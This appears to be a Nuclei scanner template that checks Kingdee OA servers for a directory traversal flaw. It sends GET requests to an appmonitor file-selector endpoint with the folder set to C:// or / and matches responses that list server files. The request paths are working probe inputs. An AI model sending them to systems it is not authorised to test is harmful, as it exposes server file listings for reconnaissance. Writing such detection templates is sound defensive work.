id: Kingdee-file-list

info:
  name: 金蝶OA 目录遍历漏洞
  author: Str1am
  severity: high
  tags: Kingdee,file

requests:
  - method: GET
    path:
      - "{{BaseURL}}/appmonitor/protected/selector/server_file/files?folder=C://&suffix="
      - "{{BaseURL}}/appmonitor/protected/selector/server_file/files?folder=/&suffix="
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "Windows"
          - "/kingdee"
        part: body
        condition: or
